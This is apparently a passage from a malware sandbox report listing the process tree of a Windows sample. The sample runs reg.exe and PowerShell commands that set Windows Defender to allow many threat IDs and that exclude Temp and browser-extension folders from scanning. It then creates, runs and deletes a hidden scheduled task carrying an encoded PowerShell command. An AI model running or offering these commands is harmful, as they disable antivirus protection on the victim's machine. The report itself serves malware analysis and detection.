\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5972
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6096
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:6024
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6040
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:784
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:992
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1164
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5372
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2124
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5152
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2888
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5160
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2956
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1212
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5192
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4004
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5256
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5272
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5024
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5268
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5292
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5332
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5336
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5436
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3928
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5856
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5844
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:780
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4380
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2924
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ANKVsfPAuVEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 
\"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 
\"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5224
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:323⤵PID:5860
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:324⤵PID:5852
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:643⤵PID:5748
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:323⤵PID:3880
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:643⤵PID:6112
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:323⤵PID:6028
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:643⤵PID:6016
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:323⤵PID:4664
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:643⤵PID:2376
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:323⤵PID:6056
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:643⤵PID:6032
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:323⤵PID:5644
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:643⤵PID:6092
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:323⤵PID:5764
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:643⤵PID:5540
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:323⤵PID:3680
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:643⤵PID:5560
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:323⤵PID:5468
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:643⤵PID:5360
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:323⤵PID:1836
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:643⤵PID:5216
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:323⤵PID:5208
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:643⤵PID:6024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:323⤵PID:5144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:643⤵PID:3068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:323⤵PID:4084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:643⤵PID:2356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:323⤵PID:5260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:643⤵PID:5264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:323⤵PID:5228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:643⤵PID:3360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:323⤵PID:5288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:643⤵PID:3656
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWqcgZIgn" /SC once /ST 01:11:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:5292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWqcgZIgn"2⤵PID:5436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWqcgZIgn"2⤵PID:1084
-
-
